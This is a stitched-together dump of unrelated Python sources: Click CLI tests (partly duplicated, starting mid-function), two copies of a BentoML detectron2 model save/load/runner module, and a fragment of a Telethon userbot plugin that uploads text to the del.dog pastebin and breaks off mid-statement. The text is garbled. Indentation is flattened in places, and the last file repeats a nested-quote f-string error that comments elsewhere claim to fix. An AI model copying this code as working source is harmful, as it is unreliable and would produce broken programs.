        @click.pass_context
        def cli(ctx, debug):
            if ctx.obj is None:
                ctx.obj = {}
            ctx.obj["DEBUG"] = debug

        @cli.command()
        @click.pass_context
        def sync(ctx):
            # single quotes inside the f-string keep this valid pre-3.12
            click.echo(f"Debug is {'on' if ctx.obj['DEBUG'] else 'off'}")

        result = runner.invoke(cli, ["sync"])
        assert result.exception is None
        assert result.output == "Debug is off\n"
def test_other_command_invoke_with_defaults(runner):
    """ctx.invoke fills omitted params from the target command's defaults."""
    @click.command()
    @click.pass_context
    def cli(ctx):
        return ctx.invoke(other_cmd)

    @click.command()
    @click.option("--foo", type=click.INT, default=42)
    @click.pass_context
    def other_cmd(ctx, foo):
        # the invoked command runs under its own canonical info_name
        assert ctx.info_name == "other-cmd"
        click.echo(foo)

    result = runner.invoke(cli, [])
    assert not result.exception
    assert result.output == "42\n"
def test_invoked_subcommand(runner):
    """ctx.invoked_subcommand tells the group callback whether a subcommand follows."""
    @click.group(invoke_without_command=True)
    @click.pass_context
    def cli(ctx):
        if ctx.invoked_subcommand is None:
            # no subcommand on the command line: fall back to `sync`
            click.echo("no subcommand, use default")
            ctx.invoke(sync)
        else:
            click.echo("invoke subcommand")

    @cli.command()
    def sync():
        click.echo("in subcommand")

    result = runner.invoke(cli, ["sync"])
    assert not result.exception
    assert result.output == "invoke subcommand\nin subcommand\n"

    result = runner.invoke(cli)
    assert not result.exception
    assert result.output == "no subcommand, use default\nin subcommand\n"
def test_aliased_command_canonical_name(runner):
    """Help for an alias is rendered under the command's canonical name."""
    class AliasedGroup(click.Group):
        def get_command(self, ctx, cmd_name):
            # resolve every name (including the "pu" abbreviation) to `push`
            return push

    cli = AliasedGroup()

    @cli.command()
    def push():
        click.echo("push command")

    result = runner.invoke(cli, ["pu", "--help"])
    assert not result.exception
    assert result.output.startswith("Usage: root push [OPTIONS]")
def test_unprocessed_options(runner):
    """UNPROCESSED args pass through untouched when unknown options are ignored.

    Fix: the f-string reused the outer double quotes inside its replacement
    field, which is a SyntaxError before Python 3.12 (PEP 701).
    """
    @click.command(context_settings=dict(ignore_unknown_options=True))
    @click.argument("args", nargs=-1, type=click.UNPROCESSED)
    @click.option("--verbose", "-v", count=True)
    def cli(verbose, args):
        click.echo(f"Verbosity: {verbose}")
        # single quotes inside the f-string keep this valid pre-3.12
        click.echo(f"Args: {'|'.join(args)}")

    result = runner.invoke(cli, ["-foo", "-vvvvx", "--muhaha", "x", "y", "-x"])
    assert not result.exception
    assert result.output.splitlines() == [
        "Verbosity: 4",
        "Args: -foo|-x|--muhaha|x|y|-x",
    ]
def test_deprecated_in_help_messages(runner):
    """Deprecated commands are flagged in --help, with or without a docstring."""
    @click.command(deprecated=True)
    def cmd_with_help():
        """CLI HELP"""
        pass

    result = runner.invoke(cmd_with_help, ["--help"])
    assert "(Deprecated)" in result.output

    @click.command(deprecated=True)
    def cmd_without_help():
        pass

    result = runner.invoke(cmd_without_help, ["--help"])
    assert "(Deprecated)" in result.output
def test_deprecated_in_invocation(runner):
    """Invoking a deprecated command emits a DeprecationWarning."""
    @click.command(deprecated=True)
    def deprecated_cmd():
        pass

    result = runner.invoke(deprecated_cmd)
    assert "DeprecationWarning:" in result.output
| import re
import click
def test_other_command_invoke(runner):
    """ctx.invoke forwards keyword arguments to another command's callback."""
    @click.command()
    @click.pass_context
    def cli(ctx):
        # call the sibling command with an explicit argument value
        return ctx.invoke(other_cmd, arg=42)

    @click.command()
    @click.argument("arg", type=click.INT)
    def other_cmd(arg):
        click.echo(arg)

    result = runner.invoke(cli, [])
    assert not result.exception
    assert result.output == "42\n"
def test_other_command_forward(runner):
    """ctx.forward re-uses the caller's params; ctx.invoke takes explicit ones."""
    cli = click.Group()

    @cli.command()
    @click.option("--count", default=1)
    def test(count):
        click.echo(f"Count: {count:d}")

    @cli.command()
    @click.option("--count", default=1)
    @click.pass_context
    def dist(ctx, count):
        # forward passes dist's own --count (default 1); invoke overrides it
        ctx.forward(test)
        ctx.invoke(test, count=42)

    result = runner.invoke(cli, ["dist"])
    assert not result.exception
    assert result.output == "Count: 1\nCount: 42\n"
def test_forwarded_params_consistency(runner):
    """A forwarded context exposes the same params dict as the forwarding one."""
    cli = click.Group()

    @cli.command()
    @click.option("-a")
    @click.pass_context
    def first(ctx, **kwargs):
        click.echo(f"{ctx.params}")

    @cli.command()
    @click.option("-a")
    @click.option("-b")
    @click.pass_context
    def second(ctx, **kwargs):
        click.echo(f"{ctx.params}")
        ctx.forward(first)

    result = runner.invoke(cli, ["second", "-a", "foo", "-b", "bar"])
    assert not result.exception
    assert result.output == "{'a': 'foo', 'b': 'bar'}\n{'a': 'foo', 'b': 'bar'}\n"
def test_auto_shorthelp(runner):
    """Short help is derived from the docstring and truncated when too long."""
    @click.group()
    def cli():
        pass

    @cli.command()
    def short():
        """This is a short text."""

    @cli.command()
    def special_chars():
        """Login and store the token in ~/.netrc."""

    @cli.command()
    def long():
        """This is a long text that is too long to show as short help
        and will be truncated instead."""

    result = runner.invoke(cli, ["--help"])
    assert (
        re.search(
            r"Commands:\n\s+"
            r"long\s+This is a long text that is too long to show as short help"
            r"\.\.\.\n\s+"
            r"short\s+This is a short text\.\n\s+"
            r"special-chars\s+Login and store the token in ~/.netrc\.\s*",
            result.output,
        )
        is not None
    )
def test_no_args_is_help(runner):
    """no_args_is_help shows the help page with exit code 0 on empty argv."""
    @click.command(no_args_is_help=True)
    def cli():
        pass

    result = runner.invoke(cli, [])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output
def test_default_maps(runner):
    """default_map overrides option defaults per subcommand."""
    @click.group()
    def cli():
        pass

    @cli.command()
    @click.option("--name", default="normal")
    def foo(name):
        click.echo(name)

    result = runner.invoke(cli, ["foo"], default_map={"foo": {"name": "changed"}})
    assert not result.exception
    assert result.output == "changed\n"
def test_group_with_args(runner):
    """A group taking an argument still shows help and requires a subcommand."""
    @click.group()
    @click.argument("obj")
    def cli(obj):
        click.echo(f"obj={obj}")

    @cli.command()
    def move():
        click.echo("move")

    # no arguments at all: help page, success
    result = runner.invoke(cli, [])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output

    # argument given but no subcommand: usage error
    result = runner.invoke(cli, ["obj1"])
    assert result.exit_code == 2
    assert "Error: Missing command." in result.output

    result = runner.invoke(cli, ["obj1", "--help"])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output

    result = runner.invoke(cli, ["obj1", "move"])
    assert result.exit_code == 0
    assert result.output == "obj=obj1\nmove\n"
def test_base_command(runner):
    """A custom BaseCommand can wrap an optparse parser inside a click group.

    Fix: parse_args used the module-level `parser` captured by closure
    instead of the instance's own `self.parser`.
    """
    import optparse

    @click.group()
    def cli():
        pass

    class OptParseCommand(click.BaseCommand):
        def __init__(self, name, parser, callback):
            super().__init__(name)
            self.parser = parser
            self.callback = callback

        def parse_args(self, ctx, args):
            try:
                # use the parser handed to the constructor, not the outer
                # `parser` variable captured through the closure
                opts, args = self.parser.parse_args(args)
            except Exception as e:
                ctx.fail(str(e))
            ctx.args = args
            ctx.params = vars(opts)

        def get_usage(self, ctx):
            return self.parser.get_usage()

        def get_help(self, ctx):
            return self.parser.format_help()

        def invoke(self, ctx):
            ctx.invoke(self.callback, ctx.args, **ctx.params)

    parser = optparse.OptionParser(usage="Usage: foo test [OPTIONS]")
    parser.add_option(
        "-f", "--file", dest="filename", help="write report to FILE", metavar="FILE"
    )
    parser.add_option(
        "-q",
        "--quiet",
        action="store_false",
        dest="verbose",
        default=True,
        help="don't print status messages to stdout",
    )

    def test_callback(args, filename, verbose):
        click.echo(" ".join(args))
        click.echo(filename)
        click.echo(verbose)

    cli.add_command(OptParseCommand("test", parser, test_callback))

    result = runner.invoke(
        cli, ["test", "-f", "test.txt", "-q", "whatever.txt", "whateverelse.txt"]
    )
    assert not result.exception
    assert result.output.splitlines() == [
        "whatever.txt whateverelse.txt",
        "test.txt",
        "False",
    ]

    result = runner.invoke(cli, ["test", "--help"])
    assert not result.exception
    assert result.output.splitlines() == [
        "Usage: foo test [OPTIONS]",
        "",
        "Options:",
        " -h, --help show this help message and exit",
        " -f FILE, --file=FILE write report to FILE",
        " -q, --quiet don't print status messages to stdout",
    ]
def test_object_propagation(runner):
    """ctx.obj set in the group callback is visible in subcommands, chained or not."""
    for chain in False, True:

        @click.group(chain=chain)
        @click.option("--debug/--no-debug", default=False)
        @click.pass_context
        def cli(ctx, debug):
            if ctx.obj is None:
                ctx.obj = {}
            ctx.obj["DEBUG"] = debug

        @cli.command()
        @click.pass_context
        def sync(ctx):
            click.echo(f"Debug is {'on' if ctx.obj['DEBUG'] else 'off'}")

        result = runner.invoke(cli, ["sync"])
        assert result.exception is None
        assert result.output == "Debug is off\n"
def test_other_command_invoke_with_defaults(runner):
    """ctx.invoke fills omitted params from the target command's defaults."""
    @click.command()
    @click.pass_context
    def cli(ctx):
        return ctx.invoke(other_cmd)

    @click.command()
    @click.option("--foo", type=click.INT, default=42)
    @click.pass_context
    def other_cmd(ctx, foo):
        # the invoked command runs under its own canonical info_name
        assert ctx.info_name == "other-cmd"
        click.echo(foo)

    result = runner.invoke(cli, [])
    assert not result.exception
    assert result.output == "42\n"
def test_invoked_subcommand(runner):
    """ctx.invoked_subcommand tells the group callback whether a subcommand follows."""
    @click.group(invoke_without_command=True)
    @click.pass_context
    def cli(ctx):
        if ctx.invoked_subcommand is None:
            # no subcommand on the command line: fall back to `sync`
            click.echo("no subcommand, use default")
            ctx.invoke(sync)
        else:
            click.echo("invoke subcommand")

    @cli.command()
    def sync():
        click.echo("in subcommand")

    result = runner.invoke(cli, ["sync"])
    assert not result.exception
    assert result.output == "invoke subcommand\nin subcommand\n"

    result = runner.invoke(cli)
    assert not result.exception
    assert result.output == "no subcommand, use default\nin subcommand\n"
def test_aliased_command_canonical_name(runner):
    """Help for an alias is rendered under the command's canonical name."""
    class AliasedGroup(click.Group):
        def get_command(self, ctx, cmd_name):
            # resolve every name (including the "pu" abbreviation) to `push`
            return push

    cli = AliasedGroup()

    @cli.command()
    def push():
        click.echo("push command")

    result = runner.invoke(cli, ["pu", "--help"])
    assert not result.exception
    assert result.output.startswith("Usage: root push [OPTIONS]")
def test_unprocessed_options(runner):
    """UNPROCESSED args pass through untouched when unknown options are ignored."""
    @click.command(context_settings=dict(ignore_unknown_options=True))
    @click.argument("args", nargs=-1, type=click.UNPROCESSED)
    @click.option("--verbose", "-v", count=True)
    def cli(verbose, args):
        click.echo(f"Verbosity: {verbose}")
        click.echo(f"Args: {'|'.join(args)}")

    result = runner.invoke(cli, ["-foo", "-vvvvx", "--muhaha", "x", "y", "-x"])
    assert not result.exception
    assert result.output.splitlines() == [
        "Verbosity: 4",
        "Args: -foo|-x|--muhaha|x|y|-x",
    ]
def test_deprecated_in_help_messages(runner):
    """Deprecated commands are flagged in --help, with or without a docstring."""
    @click.command(deprecated=True)
    def cmd_with_help():
        """CLI HELP"""
        pass

    result = runner.invoke(cmd_with_help, ["--help"])
    assert "(Deprecated)" in result.output

    @click.command(deprecated=True)
    def cmd_without_help():
        pass

    result = runner.invoke(cmd_without_help, ["--help"])
    assert "(Deprecated)" in result.output
def test_deprecated_in_invocation(runner):
    """Invoking a deprecated command emits a DeprecationWarning."""
    @click.command(deprecated=True)
    def deprecated_cmd():
        pass

    result = runner.invoke(deprecated_cmd)
    assert "DeprecationWarning:" in result.output
|
import os
import typing as t
from typing import TYPE_CHECKING
import numpy as np
from torch._C import device
from simple_di import inject
from simple_di import Provide
import bentoml
from bentoml import Tag
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..models import PTH_EXT
from ..models import YAML_EXT
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..runner.utils import Params
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
from .. import external_typing as ext
from ..models import ModelStore
try:
# pylint: disable=unused-import
import torch
import detectron2 # noqa F401
import detectron2.config as config
import detectron2.modeling as modeling
import detectron2.checkpoint as checkpoint
from detectron2.checkpoint import DetectionCheckpointer
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""detectron2 is required in order to use module `bentoml.detectron`,
install detectron2 with `pip install detectron2`. For more
information, refers to
https://detectron2.readthedocs.io/en/latest/tutorials/install.html
"""
)
MODULE_NAME = "bentoml.detectron"
@inject
def load(
    tag: t.Union[str, Tag],
    device: str = "cpu",
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "torch.nn.Module":
    """Load a detectron2 model saved under ``tag`` from the BentoML modelstore.

    Args:
        tag (:code:`Union[str, Tag]`):
            Tag of a saved model in BentoML local modelstore.
        device (:code:`str`, `optional`, default to :code:`cpu`):
            Device the model is cast to ("cpu" or "cuda"). If falsy, the
            config's default :code:`MODEL.DEVICE` is kept.
        model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
            BentoML modelstore, provided by DI Container.

    Returns:
        :obj:`torch.nn.Module`: the restored detectron2 model in eval mode.

    Examples:

    .. code-block:: python

        import bentoml
        model = bentoml.detectron.load("my_detectron_model")
    """  # noqa: LN001
    bento_model = model_store.get(tag)
    if bento_model.info.module not in (MODULE_NAME, __name__):
        raise BentoMLException(
            f"Model {tag} was saved with module {bento_model.info.module}, failed loading with {MODULE_NAME}."
        )
    weights_path = bento_model.path_of(f"{SAVE_NAMESPACE}{PTH_EXT}")
    config_path = bento_model.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}")
    cfg: config.CfgNode = config.get_cfg()
    # a config YAML is only present when one was supplied at save time
    if os.path.isfile(config_path):
        cfg.merge_from_file(config_path)
    if device:
        cfg.MODEL.DEVICE = device
    detector: "torch.nn.Module" = modeling.build_model(cfg)
    if device:
        detector.to(device)
    detector.eval()
    # restore the trained weights into the freshly built model
    DetectionCheckpointer(detector).load(weights_path)
    return detector
@inject
def save(
    name: str,
    model: "torch.nn.Module",
    *,
    model_config: t.Optional[config.CfgNode] = None,
    labels: t.Optional[t.Dict[str, str]] = None,
    custom_objects: t.Optional[t.Dict[str, t.Any]] = None,
    metadata: t.Optional[t.Dict[str, t.Any]] = None,
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
    """
    Save a model instance to BentoML modelstore.
    Args:
        name (:code:`str`):
            Name for given model instance. This should pass Python identifier check.
        model (`torch.nn.Module`):
            Instance of detectron2 model to be saved.
        model_config (`detectron2.config.CfgNode`, `optional`, default to :code:`None`):
            model config from :meth:`detectron2.model_zoo.get_config_file`
        labels (:code:`Dict[str, str]`, `optional`, default to :code:`None`):
            user-defined labels for managing models, e.g. team=nlp, stage=dev
        custom_objects (:code:`Dict[str, Any]]`, `optional`, default to :code:`None`):
            user-defined additional python objects to be saved alongside the model,
            e.g. a tokenizer instance, preprocessor function, model configuration json
        metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
            Custom metadata for given model.
        model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
            BentoML modelstore, provided by DI Container.
    Returns:
        :obj:`~bentoml.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
    Examples:
    .. code-block:: python
        import bentoml
        import detectron2
        from detectron2 import model_zoo
        from detectron2.config import get_cfg
        from detectron2.modeling import build_model
        model_url: str = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
        cfg: "CfgNode" = get_cfg()
        cfg.merge_from_file(model_zoo.get_config_file(model_url))
        cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5
        cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model_url)
        cloned = cfg.clone()
        cloned.MODEL.DEVICE = "cpu"
        model: torch.nn.Module = build_model(cloned)
        tag = bentoml.detectron.save("my_detectron_model", model, model_config=cfg)
        loaded = bentoml.detectron.load("my_detectron_model:latest")
    """  # noqa
    # Pin framework versions so the bento can rebuild a compatible env.
    # BUGFIX: the expressions previously nested double quotes inside a
    # double-quoted f-string (f"...{get_pkg_version("detectron2")}"), which is
    # a SyntaxError on Python < 3.12; single quotes match the rest of the file.
    context: t.Dict[str, t.Any] = {
        "framework_name": "detectron2",
        "pip_dependencies": [
            f"detectron2=={get_pkg_version('detectron2')}",
            f"torch=={get_pkg_version('torch')}",
        ],
    }
    options: t.Dict[str, t.Any] = dict()
    with bentoml.models.create(
        name,
        module=MODULE_NAME,
        labels=labels,
        custom_objects=custom_objects,
        options=options,
        context=context,
        metadata=metadata,
    ) as _model:
        # DetectionCheckpointer writes the weights as <SAVE_NAMESPACE>.pth
        # inside the model directory; `load` reads them back from there.
        checkpointer = checkpoint.DetectionCheckpointer(model, save_dir=_model.path)
        checkpointer.save(SAVE_NAMESPACE)
        if model_config:
            # Persist the config so `load` can rebuild the identical model.
            with open(
                _model.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}"),
                "w",
                encoding="utf-8",
            ) as ouf:
                ouf.write(model_config.dump())
        return _model.tag
from .common.model_runner import BaseModelRunner
class _DetectronRunner(BaseModelRunner):
    """Runner wrapping a saved detectron2 model for BentoML serving."""

    def __init__(
        self,
        tag: t.Union[str, Tag],
        predict_fn_name: str,
        name: t.Optional[str] = None,
    ):
        super().__init__(tag, name=name)
        # Name of the model attribute invoked per batch (e.g. "__call__").
        self._predict_fn_name = predict_fn_name

    @property
    def num_replica(self) -> int:
        # One replica per visible GPU; a single replica on CPU.
        if self.resource_quota.on_gpu:
            return len(self.resource_quota.gpus)
        return 1

    @property
    def _device(self) -> str:
        # Device string handed to `load` and to tensor construction below.
        if self.resource_quota.on_gpu:
            return "cuda"
        return "cpu"

    def _setup(self) -> None:
        self._model = load(self._tag, self._device, model_store=self.model_store)
        self._predict_fn = getattr(self._model, self._predict_fn_name)

    def _run_batch(  # type: ignore
        self,
        *args: t.Union["ext.NpNDArray", torch.Tensor],
    ) -> "ext.NpNDArray":
        params = Params[t.Union["ext.NpNDArray", torch.Tensor]](*args)

        def _mapping(item: t.Union["ext.NpNDArray", torch.Tensor]) -> torch.Tensor:
            if isinstance(item, np.ndarray):
                # BUGFIX: the legacy ``torch.Tensor(data, device=...)``
                # constructor raises for non-CPU devices, so this crashed on
                # GPU replicas; ``torch.tensor`` copies the array onto the
                # runner's device correctly.
                return torch.tensor(item, device=self._device)
            return item

        params = params.map(_mapping)
        # detectron2 models take a list of {"image": tensor} dicts per batch.
        inputs = [{"image": image} for image in params.args]
        res: "torch.Tensor" = self._predict_fn(inputs)
        return np.asarray(res)  # type: ignore
def load_runner(
    tag: t.Union[str, Tag],
    predict_fn_name: str = "__call__",
    *,
    name: t.Optional[str] = None,
) -> _DetectronRunner:
    """Build a BentoML Runner for a saved :mod:`bentoml.detectron` model.

    A Runner is a horizontally-scalable unit of serving logic; this one wraps
    the stored :obj:`torch.nn.Module` and optimizes it for the BentoML runtime.

    Args:
        tag (:code:`Union[str, Tag]`):
            Tag of a saved model in the BentoML local modelstore.
        predict_fn_name (:code:`str`, default to :code:`__call__`):
            Name of the model method invoked for inference.
        name (:code:`str`, `optional`):
            Optional runner name.
    Returns:
        :obj:`~bentoml._internal.runner.Runner`: Runner instance for
        :mod:`bentoml.detectron` models.
    Examples:
    .. code-block:: python
        import bentoml
        import numpy as np
        runner = bentoml.detectron.load_runner(tag)
        runner.run_batch(np.array([[1, 2, 3]]))
    """
    runner = _DetectronRunner(
        tag=tag,
        predict_fn_name=predict_fn_name,
        name=name,
    )
    return runner
| import os
import typing as t
from typing import TYPE_CHECKING
import numpy as np
from torch._C import device
from simple_di import inject
from simple_di import Provide
import bentoml
from bentoml import Tag
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..models import PTH_EXT
from ..models import YAML_EXT
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..runner.utils import Params
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
from .. import external_typing as ext
from ..models import ModelStore
try:
# pylint: disable=unused-import
import torch
import detectron2 # noqa F401
import detectron2.config as config
import detectron2.modeling as modeling
import detectron2.checkpoint as checkpoint
from detectron2.checkpoint import DetectionCheckpointer
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""detectron2 is required in order to use module `bentoml.detectron`,
install detectron2 with `pip install detectron2`. For more
information, refers to
https://detectron2.readthedocs.io/en/latest/tutorials/install.html
"""
)
MODULE_NAME = "bentoml.detectron"
@inject
def load(
    tag: t.Union[str, Tag],
    device: str = "cpu",
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "torch.nn.Module":
    """
    Load a model from BentoML local modelstore with given tag.
    Args:
        tag (:code:`Union[str, Tag]`):
            Tag of a saved model in BentoML local modelstore.
        device (:code:`str`, `optional`, default to :code:`cpu`):
            Device type to cast model. Default behaviour similar to :obj:`torch.device("cuda")` Options: "cuda" or "cpu". If None is specified then return default config.MODEL.DEVICE
        model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
            BentoML modelstore, provided by DI Container.
    Returns:
        :obj:`torch.nn.Module`: an instance of `torch.nn.Module`
    Examples:
    .. code-block:: python
        import bentoml
        model = bentoml.detectron.load("my_detectron_model")
    """  # noqa: LN001
    model_info = model_store.get(tag)
    # Refuse artifacts saved by a different framework module.
    if model_info.info.module not in (MODULE_NAME, __name__):
        raise BentoMLException(
            f"Model {tag} was saved with module {model_info.info.module}, failed loading with {MODULE_NAME}."
        )
    cfg: config.CfgNode = config.get_cfg()
    weight_path = model_info.path_of(f"{SAVE_NAMESPACE}{PTH_EXT}")
    yaml_path = model_info.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}")
    # The YAML config only exists when `save` was given a model_config;
    # otherwise detectron2's get_cfg() defaults are used.
    if os.path.isfile(yaml_path):
        cfg.merge_from_file(yaml_path)
    # A falsy device (None/"") keeps whatever config.MODEL.DEVICE says.
    if device:
        cfg.MODEL.DEVICE = device
    model: "torch.nn.Module" = modeling.build_model(cfg)
    if device:
        model.to(device)
    # Inference mode: freezes dropout / batch-norm statistics.
    model.eval()
    checkpointer: "DetectionCheckpointer" = checkpoint.DetectionCheckpointer(model)
    checkpointer.load(weight_path)
    return model
@inject
def save(
    name: str,
    model: "torch.nn.Module",
    *,
    model_config: t.Optional[config.CfgNode] = None,
    labels: t.Optional[t.Dict[str, str]] = None,
    custom_objects: t.Optional[t.Dict[str, t.Any]] = None,
    metadata: t.Optional[t.Dict[str, t.Any]] = None,
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
    """
    Save a model instance to BentoML modelstore.
    Args:
        name (:code:`str`):
            Name for given model instance. This should pass Python identifier check.
        model (`torch.nn.Module`):
            Instance of detectron2 model to be saved.
        model_config (`detectron2.config.CfgNode`, `optional`, default to :code:`None`):
            model config from :meth:`detectron2.model_zoo.get_config_file`
        labels (:code:`Dict[str, str]`, `optional`, default to :code:`None`):
            user-defined labels for managing models, e.g. team=nlp, stage=dev
        custom_objects (:code:`Dict[str, Any]]`, `optional`, default to :code:`None`):
            user-defined additional python objects to be saved alongside the model,
            e.g. a tokenizer instance, preprocessor function, model configuration json
        metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
            Custom metadata for given model.
        model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
            BentoML modelstore, provided by DI Container.
    Returns:
        :obj:`~bentoml.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
    Examples:
    .. code-block:: python
        import bentoml
        # import some common detectron2 utilities
        import detectron2
        from detectron2 import model_zoo
        from detectron2.config import get_cfg
        from detectron2.modeling import build_model
        model_url: str = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
        cfg: "CfgNode" = get_cfg()
        cfg.merge_from_file(model_zoo.get_config_file(model_url))
        # set threshold for this model
        cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5
        cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model_url)
        cloned = cfg.clone()
        cloned.MODEL.DEVICE = "cpu"
        model: torch.nn.Module = build_model(cloned)
        tag = bentoml.detectron.save(
            "my_detectron_model",
            model,
            model_config=cfg,
        )
        # load the model back:
        loaded = bentoml.detectron.load("my_detectron_model:latest")
        # or:
        loaded = bentoml.detectron.load(tag)
    """  # noqa
    # Pin framework versions so the bento can rebuild a compatible env.
    context: t.Dict[str, t.Any] = {
        "framework_name": "detectron2",
        "pip_dependencies": [
            f"detectron2=={get_pkg_version('detectron2')}",
            f"torch=={get_pkg_version('torch')}",
        ],
    }
    options: t.Dict[str, t.Any] = dict()
    with bentoml.models.create(
        name,
        module=MODULE_NAME,
        labels=labels,
        custom_objects=custom_objects,
        options=options,
        context=context,
        metadata=metadata,
    ) as _model:
        # DetectionCheckpointer writes the weights as <SAVE_NAMESPACE>.pth;
        # `load` reads them back from the same location.
        checkpointer = checkpoint.DetectionCheckpointer(model, save_dir=_model.path)
        checkpointer.save(SAVE_NAMESPACE)
        if model_config:
            # Persist the config so `load` can rebuild the identical model.
            with open(
                _model.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}"),
                "w",
                encoding="utf-8",
            ) as ouf:
                ouf.write(model_config.dump())
        return _model.tag
from .common.model_runner import BaseModelRunner
class _DetectronRunner(BaseModelRunner):
    """Runner wrapping a saved detectron2 model for BentoML serving."""

    def __init__(
        self,
        tag: t.Union[str, Tag],
        predict_fn_name: str,
        name: t.Optional[str] = None,
    ):
        super().__init__(tag, name=name)
        # Name of the model attribute invoked per batch (e.g. "__call__").
        self._predict_fn_name = predict_fn_name

    @property
    def num_replica(self) -> int:
        # One replica per visible GPU; a single replica on CPU.
        if self.resource_quota.on_gpu:
            return len(self.resource_quota.gpus)
        return 1

    @property
    def _device(self) -> str:
        # Device string handed to `load` and to tensor construction below.
        if self.resource_quota.on_gpu:
            return "cuda"
        return "cpu"

    def _setup(self) -> None:
        self._model = load(self._tag, self._device, model_store=self.model_store)
        self._predict_fn = getattr(self._model, self._predict_fn_name)

    def _run_batch(  # type: ignore
        self,
        *args: t.Union["ext.NpNDArray", torch.Tensor],
    ) -> "ext.NpNDArray":
        params = Params[t.Union["ext.NpNDArray", torch.Tensor]](*args)

        def _mapping(item: t.Union["ext.NpNDArray", torch.Tensor]) -> torch.Tensor:
            if isinstance(item, np.ndarray):
                # BUGFIX: the legacy ``torch.Tensor(data, device=...)``
                # constructor raises for non-CPU devices, so this crashed on
                # GPU replicas; ``torch.tensor`` copies the array onto the
                # runner's device correctly.
                return torch.tensor(item, device=self._device)
            return item

        params = params.map(_mapping)
        # detectron2 models take a list of {"image": tensor} dicts per batch.
        inputs = [{"image": image} for image in params.args]
        res: "torch.Tensor" = self._predict_fn(inputs)
        return np.asarray(res)  # type: ignore
def load_runner(
    tag: t.Union[str, Tag],
    predict_fn_name: str = "__call__",
    *,
    name: t.Optional[str] = None,
) -> _DetectronRunner:
    """Build a BentoML Runner for a saved :mod:`bentoml.detectron` model.

    A Runner is a horizontally-scalable unit of serving logic; this one wraps
    the stored :obj:`torch.nn.Module` and optimizes it for the BentoML runtime.

    Args:
        tag (:code:`Union[str, Tag]`):
            Tag of a saved model in the BentoML local modelstore.
        predict_fn_name (:code:`str`, default to :code:`__call__`):
            Name of the model method invoked for inference.
        name (:code:`str`, `optional`):
            Optional runner name.
    Returns:
        :obj:`~bentoml._internal.runner.Runner`: Runner instance for
        :mod:`bentoml.detectron` models.
    Examples:
    .. code-block:: python
        import bentoml
        import numpy as np
        runner = bentoml.detectron.load_runner(tag)
        runner.run_batch(np.array([[1, 2, 3]]))
    """
    runner = _DetectronRunner(
        tag=tag,
        predict_fn_name=predict_fn_name,
        name=name,
    )
    return runner
|
"""IX.IO pastebin like site
Syntax: .paste
Syntax: .npaste
Syntax: .paster
Syntax: .iffuci
"""
import logging
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
level=logging.WARNING)
import asyncio
import os
from datetime import datetime
import requests
from telethon import events
from userbot.utils import admin_cmd
from userbot.uniborgConfig import Config
from telethon.errors.rpcerrorlist import YouBlockedUserError
from requests import exceptions, get, post
def progress(current, total):
    """Log download progress; used as a Telethon ``progress_callback``.

    Args:
        current: bytes downloaded so far.
        total: total bytes expected (must be non-zero).
    """
    # BUGFIX: the original called ``logger.info`` but no ``logger`` name was
    # ever defined in this module (NameError on first media download).
    logging.getLogger(__name__).info(
        "Downloaded {} of {}\nCompleted {}".format(
            current, total, (current / total) * 100
        )
    )
from userbot import CMD_HELP, LOGS, TEMP_DOWNLOAD_DIRECTORY
DOGBIN_URL = "https://del.dog/"
BOTLOG_CHATID = Config.PRIVATE_GROUP_BOT_API_ID
BOTLOG = True
@borg.on(admin_cmd(pattern="paste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r["key"]}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
